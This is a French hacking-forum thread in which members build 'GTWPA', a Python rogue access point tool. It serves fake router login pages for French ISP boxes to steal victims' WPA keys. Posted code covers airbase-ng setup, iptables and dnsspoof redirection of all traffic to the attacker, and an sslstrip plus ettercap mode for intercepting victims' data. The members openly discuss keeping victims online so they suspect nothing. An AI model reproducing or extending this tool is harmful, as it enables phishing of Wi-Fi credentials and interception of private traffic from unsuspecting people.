Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 09-10-2010 14:54:09

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

Alors Alors Alors,

Il est temps que je partage un peu ce que j'ai fait, même si c'est loin d'être fini et les finitions sont vraiment à revoir (j'ai des partiels et examens régulièrement, ce qui explique que j'ai un peu de mal à tout faire).

Pour le script en python, voici l'architecture globale (pour le moment, on ne parle pas de G.U.I):

- Un fichier GTWPA.py : le script en lui même
- Un fichier fonctions.py : contient les fonctions utilisées par le script (permet d'alléger le tout et d'y voir plus clair)
- Un dossier /root/GTWPA dans lequel on trouve :
          * Les différentes archives (.tar.gz) des différentes boxes
          * Le script ainsi que son fichier python
          * Et tout ce qui sera utilisé par le script pour la suite


FICHIER GTWPA.py

#!/usr/bin/env python
# -*- coding: Utf-8 -*-

# VERSION & AUTEUR
__app__ = 'GTWPA'
__verions__ = '1.0'
__author__ = 'Dack, Carto_, Mickey, Squaks ...'

from Tkinter import *
from fonctions.py import *  # On importe le fichier contenant les fonctions nécessaires au script

menu()  # Appel de la fonction MENU qui affiche le menu et demande à l'utilisateur de faire un choix

while SECTION != 8: # Boucle qui fait tourner le programme tant que l'utilisateur n'a pas choisi l'option quitter
	
	
	# Installation

	if SECTION == 1: # Si le choix de l'utilisateur dans le menu vaut 1
    		screen_clear()
    		print " -- INSTALLATION GTWPA -- "
    		installation() # Appel à la fonction installation
    		sleep(2)
    		screen_clear()
    		menu()

	# Lancement apache2
	elif SECTION == 2:
    		screen_clear()
    		print "-- LANCEMENT DU SERVEUR APACHE2 --"
    		sleep(2)
    		os.system("service apache2 start")
    		sleep(2)
    		screen_clear()
    		menu()

	# Verification de la FAKE PAGE
	elif SECTION == 3:
    		screen_clear()
    		print "-- VERIFICATION DE LA FAKE PAGE --"
    		sleep(2)
    		os.system("firefox 127.1.1.0")
    		print "-- Tout est OK ? Alors allons-y ! --"
    		sleep(2)
    		screen_clear()
    		menu()
    
	# Parametrage de la Rogue AP
	elif SECTION == 4:
    		screen_clear()
		print "-- CONFIGURAITON DE LA ROGUE AP --"
    		recup_config()
    		dhcpd_creator()
    		sleep(2)
    		screen_clear()
    		menu()
	elif SECTION == 5:
		screen_clear()
    		print "-- LANCEMENT DE LA ROGUE AP --"
    		rogue_ap_launch()
    		dhcp_launch_rogue()
    		dnsspoof_launch()
    		sleep(2)
    		screen_clear()
		menu()
	# Soft AP sslstriped
	elif SECTION == 6:
	    print "-- Lancement SOFT AP Ssltriped"
	    os.system("killall -9 dhcpd tcpdump airbase-ng")
	    rogue_ap_launch()
	    dhcp_launch_soft()
	    os.system("xterm -hold -e sslstrip -a -k -f &> /dev/null &")
	    sleep(2)
	    os.system("xterm -hold -e ettercap -T -q -p -i at0 &> /dev/null &")
	    sleep(2)
	    print "Solf AP lancée, en attente de connexions de la part de la victime" 
	    sleep(2)
	    screen_clear()
	    menu()
	else :
		screen_clear()
		print "MAUVAIS CHOIX"
		menu()


# Quittage

screen_clear()
print "-- MERCI D'AVOIR UTILISE LE SCRIPT, N'HESITEZ PAS A NOUS FAIRE DES RETOURS ! --"
remise_zero()
sleep(2)
screen_clear()
sysexit()

Et, bien entendu, pour que vous puissiez comprendre le tout, le fichier fonctions.py

#### FICHIER DE FONCTIONS POUR GTWPA-1.0 ####

#!/usr/bin/env python
# -*- coding: Utf-8 -*-

# Importations commandes (OS: BT4 R1)

import os
from sys import exit as sysexit
from commands import getoutput
from threading import Thread
from time import sleep
from os import chdir
chdir("/root/GTWPA") # Repertoire du script contenant fichiers necessaires au script


#### FONCTIONS NECESSAIRES AU PROGRAMME ####



def installation():
    os.system("mkdir /root/GTWPA")
    "Fonction visant à l'installation du GTWPA"
    print "INSTALLATION DU PROGRAMME EN COURS ... ... ..."
    global boxe_choisie
    print "Quelle boxe désirez-vous pwned"
    print "1. Numéricable"
    print "2. Freebox"
    print "3. Livebox"
    print "4. SFR-Neufbox"
    print "5. Tele2box SpeedTouch"
    print "6. Neufbox Originale"
    box_choisie = input()
    if box_choisie == 1:
	print "Numéricable"
	os.system("cp /root/GTWPA/numericable.tar.gz /var/www")
	chdir("/var/www/")
	os.system("tar -xvzf numericable.tar.gz")
	os.system("chmod -R 777 /var/www")
	os.system("cd /root/GTWPA/")
	print "Installation TerminÈe"
	chdir("/root/GTWPA")
	
    elif box_choisie == 2:
	print "Freebox"
	os.system("cp /root/GTWPA/freebox.tar.gz /var/www")
	chdir("/var/www/")
	os.system("tar -xvzf freebox.tar.gz")
	os.system("chmod -R 777 /var/www")
	os.system("cd /root/GTWPA/")
	print "Installation TerminÈe"
	chdir("/root/GTWPA")
    elif box_choisie == 3:
	print "Livebox"
	os.system("cp /root/GTWPA/livebox.tar.gz /var/www")
	chdir("/var/www/")
	os.system("tar -xvzf livebox.tar.gz")
	os.system("chmod -R 777 /var/www")
	os.system("cd /root/GTWPA/")
	print "Installation TerminÈe"
	chdir("/root/GTWPA")
    elif box_choisie == 4:
	print "SFR-Neufbox"
	os.system("cp /root/GTWPA/neufboxsfr.tar.gz /var/www")
	chdir("/var/www/")
	os.system("tar -xvzf neufboxsft.tar.gz")
	os.system("chmod -R 777 /var/www")
	os.system("cd /root/GTWPA/")
	print "Installation TerminÈe"
	chdir("/root/GTWPA")
    elif box_choisie == 5:
	print "Tele2box SpeedTouch"
	os.system("cp /root/GTWPA/tele2box.tar.gz /var/www")
	chdir("/var/www/")
	os.system("tar -xvzf tele2box.tar.gz")
	os.system("chmod -R 777 /var/www")
	os.system("cd /root/GTWPA/")
	print "Installation TerminÈe"
	chdir("/root/GTWPA")
    elif box_choisie == 6:
	print "NeufBox Originale"
	os.system("cp /root/GTWPA/neufbox.tar.gz /var/www")
	chdir("/var/www/")
	os.system("tar -xvzf neufbox.tar.gz")
	os.system("chmod -R 777 /var/www")
	os.system("cd /root/GTWPA/")
	print "Installation TerminÈe"
	chdir("/root/GTWPA")
    else :
	print "Mauvaise entrée"
	box_choisie = input()






def airBase(BSSID, ESSID, CHANNEL, IFACE):
    "Fonction de lancement d'Airbase-ng avec différents paramètres"
    os.system("modprobe tun 2>&1 1>& /dev/null")
    os.system("xterm -e airbase-ng -a %s -e '%s' -c %s %s &>/dev/null &" % (BSSID, ESSID, CHANNEL, IFACE))
    sleep(2)




def checkRoot():
    "Fonction vérifiant que l'utilisateur est bien root"
    if getoutput('whoami') != 'root':
        print("You have to be root!")
        sysexit()



def screen_clear():
    "Fonction effectuant un clear de screen console"
    os.system("clear")
    print("\n\t\t\t[ Wpa_Graber by Carto_ ]")



def dhcpd_creator ():
    "Fonction de création du dhcpd.conf"
    DHCPDCONF="""
    ## Configuration auto-générée par le programme WPA_GRABBER
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 192.168.1.128 netmask 255.255.255.128 {
    	option subnet-mask 255.255.255.128;
        option broadcast-address 192.168.1.255;
        option routers 192.168.1.129;
        option domain-name-servers 208.67.222.222;
        range 192.168.1.130 192.168.1.140;
    }
    ## End of SoftAP auto-generated config
    """
    # On ecrit le dhcpd.conf dans le rÈpertoire
    chdir("/root/WPA_GRABBER/")
    configfile = open('dhcpd.conf', 'w')
    configfile.write(DHCPDCONF)
    configfile.close()

#### PENSER A CHANGER MON0 PAR DEFAUT
def recup_config ():
    "Fonction de récupération des paramètres pour la Rogue"
    global IFACE
    global CHANNEL
    global ESSID
    global BSSID
    IFACE = raw_input("\n-- Interface utilisée pour monter la Rogue_AP\n>>> ")
    # On vérifie que l'IFACE donnée par l'utilisateur existe bien
    while IFACE not in getoutput('iwconfig'):
        print("L'interface %s n'a pas été trouvée, veuillez la connecter à l'ordinateur et relancer le script\n" % IFACE)
        IFACE = raw_input("\n-- Interface utilisée pour monter la Rogue_AP\n>>> ")
    # On vérifie que l'interface donnée, une fois qu'elle existe, se trouve bien en mode monitor
    if not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[0] \
    and not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[1]:
        print("-- Passage de l'interface en mode monitor --")
    # Si ce n'était pas le cas alors on la passe en mode monitor
        os.system('airmon-ng start '+IFACE+' > /dev/null')
    # Si l'interface ne se passe pas en mode monitor
        if not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[0] \
        and not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[1]:
            print("Nous n'arrivons pas à passer votre interface en mode monitor")
            print("Si votre interface est en mode monitor mais n'est pas reconnue par le script, merci de donner directement l'interface en mode monitor")
            sysexit()
    # Le BSSID de la Rogue_AP
    BSSID = raw_input("\nBSSID voulu pour la Rogue (laissez blanc si vous ne désirez pas changer l'adresse mac)\n>>> ")
    while (len(BSSID) != 17) and (BSSID.count(':') != 5):
        if BSSID == '':
            BSSID = getoutput('macchanger -s '+IFACE+" | awk '{print $3}'")
            break
        print("BSSID %s n'est pas valide, merci de réessayer" % BSSID)
        BSSID = raw_input("\nBSSID voulu pour la Rogue (laissez blanc si vous ne désirez pas changer l'adresse mac)\n>>> ")

    # L'ESSID de la Rogue_AP
    ESSID = raw_input("\Nom de votre Rogue_AP (ESSID)\n>>> ")
    while ESSID == '':
        print("L'ESSID est un paramètre obligatoire, merci de renseigner ce champ")
        ESSID = raw_input("Nom de votre Rogue_AP (ESSID)\n>>> ")

    # Le   Channel de la Rogue_AP
    CHANNEL = raw_input("\nSur quel channel voulez-vous positionner votre Rogue_AP\n>>> ")
    while not CHANNEL.isdigit() and not (0 < int(CHANNEL) < 14):
        print("Channel %s n'est pas un numéro de channel valide, merci de réessayer (1-15)")
        CHANNEL = raw_input("Sur quel channel désirez-vous positionner votre Rogue_AP\n>>> ")




def rogue_ap_launch():
    "Lancement à proprement parler de la Rogue AP"
    global BSSID
    global ESSID
    global CHANNEL
    global IFACE
    print("\n\n AIRBASE-NG LANCE DANS UNE AUTRE FENETRE")
    airBase(BSSID, ESSID, CHANNEL, IFACE)
    sleep(3)
    # Configuration de l'interface at0 créée par airbase-ng
    os.system('modprobe tun && \
               ifconfig at0 up && \
               ifconfig at0 192.168.1.129 netmask 255.255.255.128 && \
               ifconfig at0 mtu 1500 && \
               route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129')
    sleep(2)



def dhcp_launch_rogue():
    "Lancement du serveur DHCP"
    print("\n LANCEMENT DU DHCP DANS UNE AUTRE FENETRE / victimes")
    os.system("xterm -hold -e dhcpd3 -d -f -cf /root/WPA_GRABBER/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &")
    print("\n LANCEMENT REGLES RELATIVES AU ROUTAGE")
    os.system("iptables --flush")
    print "1"
    os.system("iptables --table nat --flush")
    print "2"
    os.system("iptables --delete-chain")
    print "3"
    os.system("iptables --append FORWARD --in-interface at0 -j ACCEPT")
    print "4"
    os.system("iptables -t nat -A PREROUTING -p udp -j DNAT --to 208.67.222.222")
    print "5"
    os.system("iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.1.129:80")
    print "6"
    os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
    print "7"



def dhcp_launch_soft():
    "Lancement du serveur DHCP pour SOFT AP"
    print("\n LANCEMENT DU DHCP DANS UNE AUTRE FENETRE / victimes")
    os.system("xterm -hold -e dhcpd3 -d -f -cf /root/WPA_GRABBER/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &")
    print("\n LANCEMENT REGLES RELATIVES AU ROUTAGE")
    os.system("iptables --flush")
    print "1"
    os.system("iptables --table nat --flush")
    print "2"
    os.system("iptables --delete-chain")
    print "3"
    os.system("iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE")
    print "4"
    os.system("iptables --append FORWARD --in-interface at0 -j ACCEPT")
    print "5"
    os.system("iptables -t nat -A PREROUTING -p udp -j DNAT --to 208.67.222.222")
    print "6"
    os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000")
    os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
    print "7"


def dnsspoof_launch():
    "Lancement de dnsspoof correctement configuré"
    print " LANCEMENT DNSSPOOF DANS UNE AUTRE FENETRE"
    os.system("xterm -hold -e dnsspoof -i at0 -f /root/WPA_GRABBER/dns.txt &> /dev/null &")
    DNSSPOOF="""
192.168.1.129 *
"""
    chdir("/root/WPA_GRABBER/")
    configfile = open('dns.txt', 'w')
    configfile.write(DNSSPOOF)
    configfile.close()




def remise_zero():
    "Fonction de restauration des configurations antérieures et d'arrêt total"
    print(" RESTAURATION DES CONFIGURATIONS PRECEDENTES ")
    dhcp_pid = getoutput("ps aux | grep -v grep | grep 'dhcpd -cf dhcpd.conf' | awk '{print $2}'")
    airbase_pid = getoutput("ps aux | grep -v grep | grep airbase-ng | awk '{print $2}'")
    os.system('kill -9 %s && killall airbase-ng && \
               iptables -t nat -F && iptables -t nat -X && iptables -t nat -Z && \
               iptables-restore < iptables.rules && \
               echo 0 > /proc/sys/net/ipv4/ip_forward' % dhcp_pid)
    os.remove(os.getcwd()+'/dhcpd.conf')
    os.remove(os.getcwd()+'/iptables.rules')
    print("\n === MERCI D'AVOIR ESSAYE LE SCRIPT, N'HESITEZ PAS A NOUS FAIRE DES RETOURS \n")
    sysexit()



def menu():
	"Menu Général du script"
	print " --- *** SCRIPT CODED BY CARTO_ *** ---"
	print "1. Installer WPA_Grabber"
	print "2. Lancer le serveur WEP"
	print "3. Vérifier Fake Page"
	print "4. Paramétrage de la Rogue"
	print "5. Lancer Rogue"
	print "6. SOFT AP Sslstriped"
	print "7. Option déauth client"
	print "8. Quitter et retour configuration originelle"
	print "Votre choix ?"
	global SECTION
	SECTION = input()


###  END FONCTIONS ###

PLUSIEURS POINTS :

- Pour le moment, dans la mesure ou nous n'avons pas encore de réelle base fixe pour les fichiers des boxes, j'ai viré le téléchargement de ces dernières et je pars du principe qu'elles seront directement contenues dans le DOSSIER GTWPA. Je rajouterai ça dès que tout sera opérationnel

- Un petit souci pour les cartes qui créent une interface mon0 en monitor, ayant une Alpha 36H de ce type, dans le script la Rogue AP se monte directement sur mon0 et j'ai annihilé pour le moment le passage de l'interface en monitor (dès que je trouve une solution je le rends fonctionnel).

- J'ai rajouté une option Soft_AP Sslstriped, je sais que ça ne rentre pas dans l'objectif premier du script mais ça ne mange pas de pain et c'est une option en plus. Je me demande d'ailleurs si on ne pourrait pas faire en sorte qu'une fois la personne ayant rentré sa clé WPA, on pourrait éventuellement lui renvoyer le web, si disponible pour nous, afin de continuer l'attaque à l'aide d'sslstrip et d'ettercap (+ driftnet en option). Bref, c'est pas le premier de nos soucis donc ce sera à voir lors des finitions.

- J'ai testé le script sous BT4 R1 en LIVE CD, tout fonctionne chez moi. Il y a surement beaucoup de choses à modifier encore, c'est un premier jet donc je continue de coder et surtout de rendre le programme plus propre, lisible et commenté. N'hésitez donc pas à critiquer autant que possible, tant que ça reste constructif pour moi.


Dites moi donc ce que vous en pensez, je ne suis pas un pro du python mais toutes vos critiques constructives sont les bienvenues, je tâcherai d'adapter mon code pour le rendre le plus optimisé possible.


Votre dévoué,

Carto_


EDIT 1 : ATTENTION, fichier fonctions.py mal identé au niveau de la fonction installation, je copie-colle mais il me fous tout en l'air à chaque fois. Pensez à rajouter un <tab> après chaque condition (if, elif, else) pour les commandes qui suivent.

Dernière modification par Carto_ (09-10-2010 14:59:13)


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 09-10-2010 18:32:32

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [PRO]GTWPA (Developpers)

Salut sa a l'air bien ton programme peux tu m'en dire plus sur les fichiers de configuration d'apache?(genre httpd.conf) et sinon une fois que tout sera fini je ferai une version en javascript

Hors Ligne

#28 09-10-2010 20:06:01

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

J'ai pas configuré apache du tout moi, et ça marche très bien !

En gros :

service apache2 start

Et dans /var/www/

- Les fichiers de la rogue
- un .htaccess avec "ErrorDocument 404 http://192.168.1.129/index.html

Et tout fonctionne sans avoir à configurer apache comme un malade smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#29 09-10-2010 21:11:53

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

Tu dis que t'es novice dans le python mais en faite tu te débrouilles bien wink

Pour apache, dans ton script il faudrait que si apache n'est pas installé qu'il l'installe en meme temps et en plus mysql et php. On configure tout comme il faut puis les autres n'auront qu'à cliquer meme si ca fait script kiddies.

Pour la fonction Soft_AP Sslstriped, je ne trouve pas que ce soit une bonne idée car une rogue sert à avoir la clé WPA pour pouvoir se connecter à internet et non pas à sniffer des données confidentielles, apres c'est juste mon avis.

C'est vrai que ca serait un plus si apres que la victime aie rentré la clé WPA qu'elle puisse avoir internet comme ca elle pensera qu'elle est sur la vrai box.

Dernière modification par Dack (09-10-2010 21:13:44)

Hors Ligne

#30 09-10-2010 21:25:53

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

L'idée était là, plus que de coder un tool visant à faire une Rogue_AP simple, c'est de pouvoir donner internet à la victime après qu'elle eut rentrée la clé WPA pour qu'elle ne se doute de rien. D'ou la fonction intégrée dans le script, après il faut trouver un moyen de rebasculer le script sur cette partie une fois l'entrée effectuée dans wpa.txt.

Pour le python j'ai commencé à apprendre il y a 7 jours donc non je ne me débrouille pas bien après j'ai bidouillé comme j'ai pu, je continue à apprendre et j'espère pouvoir monter une G.U.I potable pour notre tool d'ici quelques semaines.

Pour le moment j'ai une version G.U.I avec trois boutons dans une fenêtre principale :
- Installation
- Configuration
- Lancement

Et suivant que l'on clique sur l'un ou l'autre on tombe sur trois autres fenetres :

- Configuration avec l'interface, le channel et le couple ESSID/BSSID à rentrer puis click sur touche validation et retour à l'interface principale avec OK en face du bouton installation désormais grisé

- Installation avec le choix de la box et une touche validée puis pareil, retour à la fenêtre principale avec OK en face du bouton installation grisé

- Me reste à m'occuper de la partie Lancement

Cela dit pour le moment la G.U.I est super moche, simples fenêtres basiques. Donc me reste à apprendre à rendre cela plus ergonomique mais j'aj bon espoir d'y arriver smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#31 09-10-2010 21:27:33

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

A mon avis quelque point n'ont pas bien été éclaircie ...

Déjà GTWPA sera installé dans "/opt/GTWPA"

GTWPA a sa propre configuration d'apache (J'ai deja tout configuré). Les fake page ne seront donc pas dans "/var/www" mais bien dans "/opt/GTWPA/server/rogue".

On va reprendre l'arborescence de GTWPA :

"/opt/GTWPA/conf" --> Dossier contenant les fichiers de configuration (apache, dnsspoof ...)
"/opt/GTWPA/server/backup" --> Dossier contenant les fichier "tar.gz" des fake panel
"/opt/GTWPA/server/rogue" --> Dossier contenant le fake panel actuellement utilisé (DocumentRoot)
"/opt/GTWPA/logs" --> Dossier contenant les différents logs (apache, dnsspoof ...)
"/opt/GTWPA/stats" --> Dossier contenant les fichier nécessaire pour la gestion des stats

Sinon pour la rogue AP sslstripped, je pense pas que ce soit la priorité absolu et que ca oriente GTWPA vers un script multifonction mais bon bref ...

Je vais regarder le script python et je re post wink


Sharkoff

Hors Ligne

#32 09-10-2010 21:46:53

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Aie ... Pour moi t'es parti dans un simple script alors que le but recherché est plus de developpement d'un soft complet un non d'un script basic ...


Sharkoff

Hors Ligne

#33 09-10-2010 22:00:52

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

Bon écoute, j'ai rappelé à maintes reprises que je ne suis en rien un codeur/programmeur chevronné. Je débute et cela fait même pas une semaine que j'ai découverts mes premiers codes python.

Donc oui, le fait est que je suis loin d'être capable de réaliser seul, en python qui plus est, un soft complet pour BT4.

Bref, tu n'as jamais posté tes configurations (fichiers) apache donc comment veux-tu diable que j'ai pu faire les mêmes ?

En somme donc, si ce que je fais n'est que sujet à critiques non constructives et inutile au projet alors je me retire humblement et je te cède la main. J'espérai pouvoir aider un peu, et être gentiment réorienté si par mégarde je n'avais pas compris un point, apparemment ça ne va pas être possible.

.


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#34 09-10-2010 22:08:23

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Excuse moi si tu as mal pris mes remarques (que je ne pense pas agressive).

Pour quelqu'un qui code en python depuis juste 7 jours, je trouve que le code est relativement propre et efficace ... La seule remarque vraiment a faire (niveau programmation) est le manque de fonction ... Tu devrais clarifier un peu ton code en dispersant tes commandes dans plus de fonctions (startApache, stopApache, testApache, etc ...)

J'avoue que mes critiques du poste précédent n'étaient pas constructive du tout étant donné que j'ai posté en cours de lecture du code (par conséquent je n'ai fais que les remarques sans les solutions).

Je ne voulais en rien te blesser/offenser et si c'est le cas je m'excuse profondemment.

Squaks.

Edit: Voici les fichier de configuration apache

Dernière modification par Squaks (09-10-2010 22:15:19)


Sharkoff

Hors Ligne

#35 09-10-2010 22:15:42

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

@Squaks : Je ne vois pas en quoi Carto s'est trompé, j'aurais fais comme lui si j'étais à sa place.

@Carto_ : Non, ton travail n'est pas inutile, c'est juste que vous vous êtes mal compris. Comme Squaks le dit ci-dessus, ce n'était pas pour t'agresser.

C'est là qu'on voit qu'on a vraiment besoin d'un serveur IRC pour parler. Vivement que M1ck3y me réponde big_smile

Carto_ a écrit :

L'idée était là, plus que de coder un tool visant à faire une Rogue_AP simple, c'est de pouvoir donner internet à la victime après qu'elle eut rentrée la clé WPA pour qu'elle ne se doute de rien. D'ou la fonction intégrée dans le script, après il faut trouver un moyen de rebasculer le script sur cette partie une fois l'entrée effectuée dans wpa.txt.

Pour le python j'ai commencé à apprendre il y a 7 jours donc non je ne me débrouille pas bien après j'ai bidouillé comme j'ai pu, je continue à apprendre et j'espère pouvoir monter une G.U.I potable pour notre tool d'ici quelques semaines.

Pour le moment j'ai une version G.U.I avec trois boutons dans une fenêtre principale :
- Installation
- Configuration
- Lancement

Et suivant que l'on clique sur l'un ou l'autre on tombe sur trois autres fenetres :

- Configuration avec l'interface, le channel et le couple ESSID/BSSID à rentrer puis click sur touche validation et retour à l'interface principale avec OK en face du bouton installation désormais grisé

- Installation avec le choix de la box et une touche validée puis pareil, retour à la fenêtre principale avec OK en face du bouton installation grisé

- Me reste à m'occuper de la partie Lancement

Cela dit pour le moment la G.U.I est super moche, simples fenêtres basiques. Donc me reste à apprendre à rendre cela plus ergonomique mais j'aj bon espoir d'y arriver smile

Apres 7 jours t'arrive à faire ca, et ben je te dis bravo !!
Apres pour l'interface graphique c'est vrai que c'est le plus dur.

Squaks a écrit :

A mon avis quelque point n'ont pas bien été éclaircie ...

Déjà GTWPA sera installé dans "/opt/GTWPA"

GTWPA a sa propre configuration d'apache (J'ai deja tout configuré). Les fake page ne seront donc pas dans "/var/www" mais bien dans "/opt/GTWPA/server/rogue".

On va reprendre l'arborescence de GTWPA :

"/opt/GTWPA/conf" --> Dossier contenant les fichiers de configuration (apache, dnsspoof ...)
"/opt/GTWPA/server/backup" --> Dossier contenant les fichier "tar.gz" des fake panel
"/opt/GTWPA/server/rogue" --> Dossier contenant le fake panel actuellement utilisé (DocumentRoot)
"/opt/GTWPA/logs" --> Dossier contenant les différents logs (apache, dnsspoof ...)
"/opt/GTWPA/stats" --> Dossier contenant les fichier nécessaire pour la gestion des stats

Sinon pour la rogue AP sslstripped, je pense pas que ce soit la priorité absolu et que ca oriente GTWPA vers un script multifonction mais bon bref ...

Je vais regarder le script python et je re post wink

Il faudra juste changer les liens dans son script.

Dernière modification par Dack (09-10-2010 22:19:43)

Hors Ligne

#36 09-10-2010 22:30:20

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

Excuse-moi aussi, j'ai été un peu vexé par tes remarques, qui n'étaient en rien agressives mais tout content de poster mon Code, forcément qu'il soit à coté de la plaque m'a tué, mais c'est le cas :-D

Bref, oublions vite tout ça (je suis un peu susceptible, un point sur lequel je dois progresser).

- Pour ce qui est de l'arborescence du script, pas de soucis je peux changer ça, ça prend trois minutes, et ce n'est qu'un brouillon.

- Par contre ce qui m'embête plus c'est lorsque tu me dis que c'est un "simple" script et que l'on cherche à développer un tool. Qu'entends-tu par là ? J'ai en effet monté un simple script sans penser que l'on pouvait faire autrement mais je trouve l'idée beaucoup plus intéressante, peux-tu préciser un peu, je tâcherai de comprendre et de me diriger dans ce sens !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#37 09-10-2010 22:40:19

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Effectivement, vivement un chan IRC smile

Une fonction permettant de mettre à jour la liste des fake panels disponible sans toucher au script. Il ne fais rien en l'etat, il faut l'adapter.

def searchPanel():
	panel_list = getoutput("ls /opt/GTWPA/server/backup").split("\n")
	return panel_list

def setupRogue():
	panel_list = searchPanel()
	print("Fake panels available :")
	i=1
	for panel in panel_list:
		print(str(i) + "-" + panel)
		i++
	selected_panel = input()
	print(panel_list[selected_panel-1])

Quand je dis simple script, je n'entend pas par la simple script qui calcule 1+1 ... Je veux plutot dire qui peux s'executer de n'importe ou et qu'il n'ai pas une arborescence propre à lui (d'apres ce que j'ai compris, je me suis peut-etre planter).

En faite je ne sais pas vraiment comment m'exprimer la dessus ... Par exemple ton code génère un fichier conf dhcpd (encore une fois si je ne me plante pas) alors que pour moi il devrait etre dans "/opt/GTWPA/conf".

Dernière modification par Squaks (09-10-2010 22:46:52)


Sharkoff

Hors Ligne

#38 09-10-2010 22:49:48

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

EDIT : On n'utilise plus ça, on utilise ce qu'il y a marqué en dessous Tinychat.

Dernière modification par Dack (09-10-2010 23:17:09)

Hors Ligne

#39 09-10-2010 22:58:49

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

J'arrive sur le chan IRC dès demain je ne suis pas chez moi ce soir.

J'ai compris ce que tu voulais dire pour le tool, plus qu'un "simple" script ! Je vais effectuer quelques modifications dans les jours qui viennent et tu me diras ce que tu en penses. En gros le tool télécharge et met à jour tout depuis le net, et utilise ça pour fonctionner (directement dans l'arbo que tu as donné)


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#40 09-10-2010 23:01:53

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : [PRO]GTWPA (Developpers)

Pour l'IRC, on pourrait aussi utiliser Tinychat qui m'a été conseillé par Antares wink
J'y ai crée un chan, allez sur TInychat - GTPWA

Hors Ligne

#41 09-10-2010 23:04:23

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Dack a écrit :

Alors serveur : EuropNet
Channel : GTPWA

GTPWA ou GTWPA ? Tu y va ce soir ou on parle plutot demain ?


Sharkoff

Hors Ligne

#42 09-10-2010 23:27:31

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

On se donne rendez-vous demain dessus (en tous cas pour ma part). Je n'arrive pas à dwnld ton fichier conf apache2 Squaks, on me dit qu'il est "présentement indisponible" (bien un truc de Québéquoi ça ! :p).


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#43 09-10-2010 23:29:55

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : [PRO]GTWPA (Developpers)

Oauis j'ai vu ca c'est bizzard ... Sinon je suis ok pour tinychat demain wink


Sharkoff

Hors Ligne

#44 10-10-2010 00:02:06

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : [PRO]GTWPA (Developpers)

def installation():
    os.system("rm -f -r /opt/GTWPA")
    os.system("mkdir /opt/GTWPA")
    os.system("mkdir /opt/GTWPA/conf")
    os.system("mkdir /opt/GTWPA/server")
    os.system("mkdir /opt/GTWPA/server/backup")
    os.system("mkdir /opt/GTWPA/server/rogue")
    os.system("mkdir /opt/GTWPA/logs")
    os.system("mkdir /opt/GTWPA/stats")
    chdir("/opt/GTWPA/server/backup/")
    os.system("wget http://www.crack-wpa.fr/tl/Numericable.tat.gz")
    print "..."
    "Fonction d'installation de WPA_GRABBER"
    print "Installation du programe ..."
    print "Installation du programme ... ..."
    print "Installation du programme ... ... ..."
    global boxe_choisie
    print "Quelle Boxe desirez-vous prendre ? "
    print "1. Numericable"
    print "2. Freebox"
    print "3. Livebox"
    print "4. SFR-Neufbox"
    print "5. Tele2box SpeedTouch"
    print "6. Neufbox Originale"
    print "7. Portail ENT-Universitaire"
    box_choisie = input()
    
    if box_choisie == 1:
	print "Installation de : Boxe Numericable"
